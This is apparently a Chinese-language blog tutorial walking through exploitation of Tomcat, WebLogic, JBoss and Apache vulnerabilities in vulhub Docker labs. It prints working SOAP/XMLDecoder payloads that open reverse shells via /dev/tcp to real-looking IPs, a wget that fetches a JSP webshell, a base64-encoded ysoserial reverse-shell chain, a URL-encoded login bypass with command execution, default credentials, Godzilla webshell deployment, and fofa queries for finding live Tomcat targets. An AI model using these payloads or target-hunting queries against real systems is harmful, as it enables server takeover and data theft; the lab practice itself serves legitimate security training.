先准备好今天要使用的木马文件
使用哥斯拉生成木马
![](https://i-blog.csdnimg.cn/img_convert/6ef36596fa31e2ae76dc0c7dfd99a713.png)
![](https://i-blog.csdnimg.cn/img_convert/8cb266db2a0d90042a19abc6a3f20558.png)
![](https://i-blog.csdnimg.cn/img_convert/56d5df8ae6ff708436a9fce9d7b5cee8.png)
![](https://i-blog.csdnimg.cn/img_convert/ac7b33832e53479ec28769845327d4b9.png)
压缩成zip文件 改名为war后缀
一:Tomcat
1.1CVE-2017-12615
环境搭建
cd vulhub-master/tomcat/CVE-2017-12615
docker-compose up -d
![](https://i-blog.csdnimg.cn/img_convert/5dffb7a4238a58bdf6a28fc19ce8a99b.png)
1.首页抓包,修改为 PUT 方式提交 发送shell.jsp 和木马内容 201创建成功
![](https://i-blog.csdnimg.cn/img_convert/b297fe34d8c5881761257fa630537385.png)
![](https://i-blog.csdnimg.cn/img_convert/f4be82bec9b25ab6025dc21a3b302584.png)
2.访问木马页面空白 就说明上传成功
![](https://i-blog.csdnimg.cn/img_convert/d5b88afa0885e41141f45cd0d66e6899.png)
3.回到哥斯拉 连接 密码和密钥 生成木马没改 这里连接也不用改
![](https://i-blog.csdnimg.cn/img_convert/762d22423e65b7e177613473ebf8c63d.png)
![](https://i-blog.csdnimg.cn/img_convert/d2ff8a683781d3394a832e5c6decd729.png)
进入终端执行命令
![](https://i-blog.csdnimg.cn/img_convert/66df5b459f10a838cadde5c10d729d7e.png)
1.2后台弱口令部署var包
环境搭建
cd vulhub-master/tomcat/tomcat8
docker-compose up -d
![](https://i-blog.csdnimg.cn/img_convert/b35ec7fe86ffc38682e56853d44dda36.png)
1.制作WAR包
制作WAR包,将JSP⽊⻢压缩为ZIP格式,然后修改后缀为war就可以了。
var包相当于压缩包
![](https://i-blog.csdnimg.cn/img_convert/a9430bcb68d8a4fa590b8451ee807bcf.png)
2.弱密码登录 tomcat tomcat
![](https://i-blog.csdnimg.cn/img_convert/ebe6ae9d241728533aaa63a405a0bb03.png)
![](https://i-blog.csdnimg.cn/img_convert/7f05b74ab45a9460fbd382b80e221623.png)
3.上传war文件并访问
选择var文件用来上传
![](https://i-blog.csdnimg.cn/img_convert/42a7c93773375d6b92704f5464bd5558.png)
![](https://i-blog.csdnimg.cn/img_convert/aa4017cce39f89a72904ba6c16bd368a.png)
访问木马地址 页面空白 说明上传成功
![](https://i-blog.csdnimg.cn/img_convert/302fbaf4d27f0af48b6adccc85d00b40.png)
4.连接马
![](https://i-blog.csdnimg.cn/img_convert/c6b31b2108c914d2d05fd3bf3ba5b0c7.png)
1.3 CVE_2020-1938
环境搭建
cd vulhub-master/tomcat/CVE-2020-1938
docker-compose up -d
![](https://i-blog.csdnimg.cn/img_convert/3e16313ab0ad5ea9242247535df72ad3.png)
![](https://i-blog.csdnimg.cn/img_convert/b9b027d96c4c314fd93bcf2b0aacce47.png)
1.POC 攻击
tomcat有一个配置文件 /web_inf/web.xml
python cve-2020-1938.py -p 8009 -f /WEB-INF/web.xml 靶机IP
![](https://i-blog.csdnimg.cn/img_convert/9e35b62030f1960be95b88b77e2be1ef.png)
1.4实战挖洞
fofa
app=
"tomcat"
server=
"Apache Tomcat" && body=
"Apache Tomcat"
识别:如果给你⼀个⽹站你怎么判断它使⽤了tomcat这个中间件呢
1.默认端⼝ 8080 2.浏览器的指纹识别插件
3.默认管理路由 /manage/html
4.server头 Apache Tomcat
指纹识别 识别网站用了什么技术
![](https://i-blog.csdnimg.cn/img_convert/2a1c0b16d7b46a3ea7fee7348dc3ec82.png)
![](https://i-blog.csdnimg.cn/img_convert/e952d35cd67d22334c5eb9ec204a339c.png)
tomcat 8 /manage里面有内容 9删掉了后台
二、Weblogic
2.1后台弱口令GetShell
环境搭建
cd vulhub-master/weblogic/weak_password
docker-compose up -d
![](https://i-blog.csdnimg.cn/img_convert/1a3c579b64476c3ace1fc36d051d1264.png)
这个报错页面是默认的weblogic页面
![](https://i-blog.csdnimg.cn/img_convert/9e67b083f5f00a6157d8be668128d229.png)
1.进入/console 弱口令登录
默认账号密码:weblogic/Oracle@123
weblogic常⽤弱⼝令:https://cirt.net/passwords?criteria=weblogic
这⾥注意, 单个账号错误密码5次之后就会⾃动锁定。
访问 登录成功
![](https://i-blog.csdnimg.cn/img_convert/3579a46845d85c69399d13bba93113ed.png)
![](https://i-blog.csdnimg.cn/img_convert/55b1a8e10d01e97c41b7167691f679ce.png)
2.上传马
![](https://i-blog.csdnimg.cn/img_convert/1b4ec34488e8f1aebff888dffabec355.png)
![](https://i-blog.csdnimg.cn/img_convert/47bb8568999b894ed480576f9ea6a545.png)
![](https://i-blog.csdnimg.cn/img_convert/52fddbdbd925660a4a1f6a5117fc6ec0.png)
一直点下一步 完成安装
![](https://i-blog.csdnimg.cn/img_convert/47b5b4f7466de588b081b17cc03275bb.png)
上传以后访问 页面空白说明上传成功
![](https://i-blog.csdnimg.cn/img_convert/3d696232dd89ec3a29fae429c28f35f9.png)
3.连接马
![](https://i-blog.csdnimg.cn/img_convert/f59f4065b1f3a2900d0561613441198e.png)
![](https://i-blog.csdnimg.cn/img_convert/76304cd7e31182d21ca5f35dcf381856.png)
2.2CVE-2017-3506
环境搭建
cd vulhub-master/weblogic/weak_password
docker-compose up -d
![](https://i-blog.csdnimg.cn/img_convert/1a3c579b64476c3ace1fc36d051d1264.png)
1.验证是否存在wls-wsat组件
访问以下⽬录中的⼀种,有回显如下图可以判断wls-wsat组件存在
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
![](https://i-blog.csdnimg.cn/img_convert/e73044f66ccd81eb248e5670024c8faa.png)
2.在当前页面抓包之后,添加下面请求包,反弹shell
右键 改变请求方法
![](https://i-blog.csdnimg.cn/img_convert/520ea29c9023f51f99d2358447d596ab.png)
添加请求数据包
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/124.221.58.83/6666 0>&1</string>
</void>
</array>
<void method="start"/></object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
3.本机开启监听
nc -lvvp 8888
![](https://i-blog.csdnimg.cn/img_convert/7384d04d04899d322578ae9ca9916181.png)
修改 Content-Type: text/xml
![](https://i-blog.csdnimg.cn/img_convert/689655c3105114147ff84c5ebcd854e7.png)
端口正常
![](https://i-blog.csdnimg.cn/img_convert/e4688586457d4f088182718da5e931d4.png)
2.3 CVE-2019-2725
环境搭建
cd vulhub-master/weblogic/weak_password
docker-compose up -d
![](https://i-blog.csdnimg.cn/img_convert/1a3c579b64476c3ace1fc36d051d1264.png)
1.漏洞验证
_async/AsyncResponseService
![](https://i-blog.csdnimg.cn/img_convert/d471a7aa4746b031d364e721062abcaf.png)
2.远程部署马
![](https://i-blog.csdnimg.cn/img_convert/621c0fac629de76c94d0164145243bc1.png)
![](https://i-blog.csdnimg.cn/img_convert/bf7ba0594ab461c139784c795ccd5e51.png)
访问部署马81端口
![](https://i-blog.csdnimg.cn/img_convert/5ed3d1c1102b49cfb638eb399cee5f6d.png)
3.在当前页面抓包 , 修改请求包 , 写入shell
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://114.132.92.17/2.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/678.jsp
</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header><soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
木马位置:http://ip:7001/bea_wls_internal/678.jsp
![](https://i-blog.csdnimg.cn/img_convert/f3e2ab0508788c025109ec00bf5883e1.png)
![](https://i-blog.csdnimg.cn/img_convert/2552143d36780d039ae59ef907ab2664.png)
4.访问木马 页面空白说明文件上传成功
![](https://i-blog.csdnimg.cn/img_convert/a4357291e45703f17d57eea6e379bbc1.png)
5.连接马
![](https://i-blog.csdnimg.cn/img_convert/daf44ed4c63eb5533980135d4e4ff34d.png)
2.4 CVE-2018-2628
环境搭建
cd vulhub-master/weblogic/CVE-2018-2628
docker-compose up -d
![](https://i-blog.csdnimg.cn/img_convert/2323e1c18492b75b0da81a34dd201c08.png)
![](https://i-blog.csdnimg.cn/img_convert/b8e43698c59d1a51266960fdd34cc157.png)
1.使用漏洞利用工具检查
![](https://i-blog.csdnimg.cn/img_convert/b04ab0bc00b39621ccc49773bea26800.png)
![](https://i-blog.csdnimg.cn/img_convert/b8bab80eaf99c2b987194218a84ee30d.png)
2.5 CVE-2018-2894
环境搭建
cd vulhub-master/weblogic/CVE-2018-2894
docker-compose up -d
![](https://i-blog.csdnimg.cn/img_convert/1326858f65778cb43713f71db1f7d868.png)
这⾥环境后台密码是随机得,获取密码: docker-compose logs | grep password
![](https://i-blog.csdnimg.cn/img_convert/a16569fb8c52600ccd4fd5766a4bb477.png)
进入/console 登录
![](https://i-blog.csdnimg.cn/img_convert/cd8150e4cfee9812c1bb5d089fdc5c67.png)
1.设置Web服务测试开启点击保存
![](https://i-blog.csdnimg.cn/img_convert/681d2a9cc0beaab8f6ae2d69103b50f9.png)
![](https://i-blog.csdnimg.cn/img_convert/9ab09de8e7c52c0e4d5866f8b702a45b.png)
![](https://i-blog.csdnimg.cn/img_convert/214dbba70d0ba09c34ea2e61eab35c48.png)
2.进入 config.do ⽂件进⾏设置
121.40.229.129:7001/ws_utc/config.do
进入修改当前工作目录
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
![](https://i-blog.csdnimg.cn/img_convert/39b8dd3c2c5552a0af05af8edd4829e8.png)
![](https://i-blog.csdnimg.cn/img_convert/31b99dea1c15b519aec65e9293fe4ef6.png)
3.上传马
![](https://i-blog.csdnimg.cn/img_convert/6926f63f16fa0e84e559cb41acc2279d.png)
![](https://i-blog.csdnimg.cn/img_convert/405497904409b3e3e6a3e90d1c32e978.png)
提交后在查看器查找木马上传位置
![](https://i-blog.csdnimg.cn/img_convert/75326252e70c1ec111918e4965c7132a.png)
4.访问马 页面空白说明上传成功
![](https://i-blog.csdnimg.cn/img_convert/6c92e79ef8427dcba20f349315c266cb.png)
5.连接马
![](https://i-blog.csdnimg.cn/img_convert/ed91da7161f0585a9ce4f1886c8d4963.png)
2.6 CVE-2020-14882
环境搭建
cd vulhub-master/weblogic/CVE-2020-14882
docker-compose up -d
![](https://i-blog.csdnimg.cn/img_convert/3e575252ab8a637f823e8ab084935268.png)
1.访问管理控制台
/console 来到工作台
![](https://i-blog.csdnimg.cn/img_convert/a1cfc3eb1672c3bccb6a13cb43ffda11.png)
2.使用url绕过登录
/console/css/%252e%252e%252fconsole.portal
第一次进入404正常
![](https://i-blog.csdnimg.cn/img_convert/7bc6985435b3bbb107740f53fea6dd35.png)
继续访问 即可绕过登录
![](https://i-blog.csdnimg.cn/img_convert/8899d611b53292eb3c70cdc7f3c259b0.png)
3.远程加载xml 获取shell
/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success');")
404 是正常的 来到终端查看是否上传成功
![](https://i-blog.csdnimg.cn/img_convert/130cc6261be9d3dcb6cf1f9ca3b8d42c.png)
![](https://i-blog.csdnimg.cn/img_convert/9178d723a4b975f4568cedf83cf9492e.png)
反弹shell
![](https://i-blog.csdnimg.cn/img_convert/68379d71e3dfbb267ac007b474233664.png)
![](https://i-blog.csdnimg.cn/img_convert/ae97ae61e35e031dab977c25f7d8239d.png)
设置反弹shell
![](https://i-blog.csdnimg.cn/img_convert/08549a73f1518126e286bca230dab418.png)
改名字
![](https://i-blog.csdnimg.cn/img_convert/ffeba2713c8402379c550a504ced691e.png)
![](https://i-blog.csdnimg.cn/img_convert/0ec5a24707af272bf665e94f154937dd.png)
重新开端口监听6666
![](https://i-blog.csdnimg.cn/img_convert/edff5521d44feb33a6e00baa909aa435.png)
命令实在1.xml里面写的收到反弹shell
![](https://i-blog.csdnimg.cn/img_convert/338960122cf108e22b0edba3df8c1d23.png)
三:Jboss
3.1 CVE-2015-7501
环境搭建
cd vulhub-master/jboss/JMXInvokerServlet-deserialization
docker-compose up -d
![](https://i-blog.csdnimg.cn/img_convert/8d972cef8ccc82729cddca697b6517ef.png)
![](https://i-blog.csdnimg.cn/img_convert/793f4bebc2fe74660ad3eae9006bebce.png)
1.POC 访问地址
http://121.40.229.129:8080/invoker/JMXInvokerServlet
返回如下,说明接口开放,此接口存在反序列化漏洞
![](https://i-blog.csdnimg.cn/img_convert/2094301882c8eb03df77f71074aee240.png)
2.下载 ysoserial ⼯具进行漏洞利用
先本地开启反弹shell的监听接口
![](https://i-blog.csdnimg.cn/img_convert/98848258982cca75b896ab5856e62afc.png)
将反弹shell进⾏base64编码
bash -i >& /dev/tcp/8.155.8.82/8888 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1NS44LjgyLzg4ODggMD4mMQ==
curl http://8.155.7.133:8080/invoker/JMXInvokerServlet --data-binary @exp.ser
![](https://i-blog.csdnimg.cn/img_convert/4463ccd198bce309ceb00ac54b752d3f.png)
工具目录进入cmd
java8 -jar ysoserial-all.jar CommonsCollections5 "bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1NS44LjgyLzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i} ">exp.ser
![](https://i-blog.csdnimg.cn/img_convert/ab116716fee91dbc133f94d1d979fbef.png)
3.执行命令
curl http://8.155.8.82:8080/invoker/JMXInvokerServlet --data-binary @exp.ser
4.成功反弹
![](https://i-blog.csdnimg.cn/img_convert/3672ce53a96e677bfd92255226617d0c.png)
3.2 CVE-2017-7504
环境搭建
cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d
![](https://i-blog.csdnimg.cn/img_convert/5d43e972788dc5057487bdf0d81942d0.png)
1.测试漏洞
/jbossmq-httpil/HTTPServerILServlet
![](https://i-blog.csdnimg.cn/img_convert/3c81e80559ebfcb2a3426d8827b2380d.png)
2.工具探测
![](https://i-blog.csdnimg.cn/img_convert/42677eeb4f7d35efa16d6d740b819b57.png)
python3 jexboss.py -u http://8.155.8.82:8080
![](https://i-blog.csdnimg.cn/img_convert/cc3911222a8b522ab93aeff226fa2239.png)
![](https://i-blog.csdnimg.cn/img_convert/67390cd9065167f24411a25e509bb2db.png)
![](https://i-blog.csdnimg.cn/img_convert/a0508d89574990bfc14af49656565317.png)
3.3 CVE-2017-12149
环境搭建
cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d
![](https://i-blog.csdnimg.cn/img_convert/44601d2b57070d5567eeffc726a856c4.png)
1.访问漏洞页面
![](https://i-blog.csdnimg.cn/img_convert/6403757ffb5a5b1c4349988352cb8ad5.png)
2.验证是否存在漏洞 , 访问
http://8.155.8.82:8080/invoker/readonly
![](https://i-blog.csdnimg.cn/img_convert/e3c30cccc3c64080cc3354b986c382c9.png)
![](https://i-blog.csdnimg.cn/img_convert/b87f4ff8c05be339e451cc187a46901e.png)
访问地址:/invoker/readonly
该漏洞出现在/invoker/readonly中 ,服务器将用户post请求内容进行反序列化
![](https://i-blog.csdnimg.cn/img_convert/7071f623440aafb45ccbd69b342120ac.png)
返回500,说明页面存在,此页面存在反序列化漏洞
3.使用工具进行检测 DeserializeExploit 如果成功直接上传webshell即可
![](https://i-blog.csdnimg.cn/img_convert/3e57db74c496efe2bc2f0b7de8746580.png)
3.4 Administration Console弱口令
环境搭建
cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d
![](https://i-blog.csdnimg.cn/img_convert/d28dc0099f64ac553032a6a3917d186e.png)
![](https://i-blog.csdnimg.cn/img_convert/982ce8bbcb4396e38f54a0b19c509117.png)
密码文件
/jboss-6.1.0.Final/server/default/conf/props/jmx-console-users.properties
账户:密码admin:vulhub
访问地址:/admin-console/login.seam
![](https://i-blog.csdnimg.cn/img_convert/7fd3ccb2f67bcaf219d254436700029c.png)
登录后台 上传木马文件
![](https://i-blog.csdnimg.cn/img_convert/bc6d287f702a490f9b67015288c7810a.png)
![](https://i-blog.csdnimg.cn/img_convert/022266f207a03b2237fd4d0bdbad1894.png)
![](https://i-blog.csdnimg.cn/img_convert/b0955e9851f20281cd3fdde751ebc301.png)
进行木马连接
http://IP:8080/shell/shell.jsp
![](https://i-blog.csdnimg.cn/img_convert/993528ac86b153726119532537da3b85.png)
![](https://i-blog.csdnimg.cn/img_convert/b2acd9f7dae2a06896d7be572be55af6.png)
3.5 低版本JMX Console未授权
环境搭建
cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d
![](https://i-blog.csdnimg.cn/img_convert/1725c4359685efc1cda3c58c6d690b6f.png)
访问 /jmx-console 正常不需要登录 这里漏洞不存在 需要登录admin admin
![](https://i-blog.csdnimg.cn/img_convert/d24a9e46d08a651750c28881ea69e8ce.png)
![](https://i-blog.csdnimg.cn/img_convert/0fc7137a6743eefc47b5770343454776.png)
远程部署war包
![](https://i-blog.csdnimg.cn/img_convert/f88fd0b108dd126a5125c29fe3f720fd.png)
python3 -m http.server 81
![](https://i-blog.csdnimg.cn/img_convert/0d3c1cd0ad028a7738fc77318b89af42.png)
war包访问成功
![](https://i-blog.csdnimg.cn/img_convert/70f48a84efd0478a644ff4c87860ddeb.png)
来到靶机
![](https://i-blog.csdnimg.cn/img_convert/7f56ba3d6362d245e419211762cbe0ae.png)
http://8.155.8.82:81/java.war //填入ParamValue
![](https://i-blog.csdnimg.cn/img_convert/cd8a476f1261da0364c5116fa988ffa3.png)
![](https://i-blog.csdnimg.cn/img_convert/10e84ef5e1c19338a250556825bc3582.png)
访问
![](https://i-blog.csdnimg.cn/img_convert/d002c54ddff5fde547a138e8babcc099.png)
进行木马连接
![](https://i-blog.csdnimg.cn/img_convert/3d80be8770503ad88e3566a459e824ad.png)
3.6 高版本JMX Console未授权
环境搭建
cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d
![](https://i-blog.csdnimg.cn/img_convert/7c7433623579f927a7d36a481f04db3c.png)
访问 /jmx-console
因为使⽤环境不存在该漏洞所以需要输⼊账户密码:admin vulhub
![](https://i-blog.csdnimg.cn/img_convert/2bf402e4b64b5cf4329645b9f08442ce.png)
搭建远程部署 , 部署远程war包地址
![](https://i-blog.csdnimg.cn/img_convert/383c6ea0506a42a4b67629542fc0d542.png)
在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer
![](https://i-blog.csdnimg.cn/img_convert/e61796249c4bca80a327cdd9d8296ccf.png)
进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏
远程部署
![](https://i-blog.csdnimg.cn/img_convert/1db4bcc21cb6f5d40e7103f2829d3f5a.png)
![](https://i-blog.csdnimg.cn/img_convert/2949f06087ea32de43faf65327e2d8bc.png)
进行木马连接
![](https://i-blog.csdnimg.cn/img_convert/aa9455e76cb3739bb106535ad838b8e7.png)
四、Apache
环境搭建 拉取并开启
docker pull blueteamsteve/cve-2021-41773:no-cgid
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
开启靶场
![](https://i-blog.csdnimg.cn/img_convert/19f6f943191f6acd0dab92b85fa2a299.png)
1.使用POC
![](https://i-blog.csdnimg.cn/img_convert/33595b85ceb486dc217548e451161125.png)
2.工具验证
![](https://i-blog.csdnimg.cn/img_convert/9ac11b5ebd368404ee8287ff9f63a841.png)
![](https://i-blog.csdnimg.cn/img_convert/5f429b97dc77600c9a5b34e2cd0a9a5b.png)